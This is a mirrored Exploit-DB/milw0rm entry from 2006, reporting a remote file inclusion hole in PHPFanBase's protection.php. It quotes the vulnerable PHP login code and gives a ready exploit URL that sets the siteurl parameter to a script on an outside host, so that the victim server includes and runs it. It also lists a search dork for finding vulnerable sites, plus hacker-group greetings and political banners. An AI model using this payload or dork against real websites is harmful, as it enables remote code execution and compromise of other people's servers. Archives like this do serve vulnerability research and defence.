bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/2957.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

133 lines
3.7 KiB
Text
Executable file
Raw Blame History

--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
PHPFanBase (protection.php) Remote File Include Vulnerability
Found By : CoLd Zero [ Wasem898 ]
Source : www.4azhar.com
SpECiALPowEr.oRg
A_mal Team
PalesTine Arab Muslim Hacker
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
######################################################
#
# PHPFanBase ]All[
#
# Class: Remote File Include Vulnerability
# Published 2006-12-19
# Remote: Yes
# Type: Dangerous
# Site: http://codegrrl.com/!/scripts/
#
# Author: Cold Zero
# Contact: c.o.1.d.0@hotmail.com
#
# Dork: Powered By PHPFanBase
######################################################
File :
/protection.php
===========================
<?
$user_passwords = array (
"$admin_username" => "$admin_password" );
// This is the page to show when the user has been logged out
$logout_page = "$siteurl";
// Page with login form
$login_page = "login.php";
// Page to show if the user enters an invalid login name or password
$invalidlogin_page = "invalidlogin.php";
//DON'T EDIT ANYTHING BELOW THIS!!!
if ($action == "logout")
{
Setcookie("logincookie[pwd]","",time() -86400);
Setcookie("logincookie[user]","",time() - 86400);
include($logout_page);
exit;
}
else if ($action == "login")
{
if (($loginname == "") || ($password == ""))
{
include($invalidlogin_page);
exit;
}
else if (strcmp($user_passwords[$loginname],$password) == 0)
{
Setcookie("logincookie[pwd]",$password,time() + 86400);
Setcookie("logincookie[user]",$loginname,time() + 86400);
}
else
{
include($invalidlogin_page);
exit;
}
}
else
{
if (($logincookie[pwd] == "") || ($logincookie[user] == ""))
{
include($login_page);
exit;
}
else if
(strcmp($user_passwords[$logincookie[user]],$logincookie[pwd]) =
= 0)
{
Setcookie("logincookie[pwd]",$logincookie[pwd],time() +
86400);
Setcookie("logincookie[user]",$logincookie[user],time() +
86400)
;
}
else
{
include($invalidlogin_page);
exit;
}
}
===========================
Exploit :
Http://www.Victem.0/[PaTH]/protection.php?action=logout&siteurl=http://4azhar.com/soft.txt?
======================================================
---- GreeTz: [MoHaNdKo] [Cold One] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
[Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[ Everyone I know
****************************************************************
# *www.4azhar.com Securty Team >> www.4azhar.com *
# *SpeciaL PoweR SecuritY Team >> www.specialpower.org *
# *A_mal Hacking Team >> -vv -l -p The-Pradise *
*****************************************************************
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
# milw0rm.com [2006-12-19]
Reference in a new issue View git blame Copy permalink